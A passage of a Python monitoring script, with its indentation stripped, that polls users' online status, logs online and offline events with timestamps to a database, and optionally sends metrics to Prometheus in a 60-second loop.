if int(state) == user_online:
continue
if user_online == 0:
db.InsertOffline(conn, user_id, timestamp, user_last_seen, False)
elif user_online == 1:
db.InsertOnline(conn, user_id, timestamp, False)
conn.commit()
if self.CONFIG.PROMETHEUS_SEND:
self.pgt_sender.SendFromPool()
self._waiter()
def _waiter(self):
UPD_SECONDS = 60
i = 0
while self.is_running and i < UPD_SECONDS:
i = i + 1
time.sleep(1)
def _updateDopUsers(self):
if self.CONFIG.HAS_UPSER_FILE:
fs_tools.GetIdList(self.CONFIG.USERS_FILE)
def GetUnixTimestamp(self):
return datetime.now().timestamp()
def _handleExit(self, sig, frame):
self.is_running = False
print('Stopping')
if __name__ == '__main__':
app = Main()
app.Start()
app.Wait() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.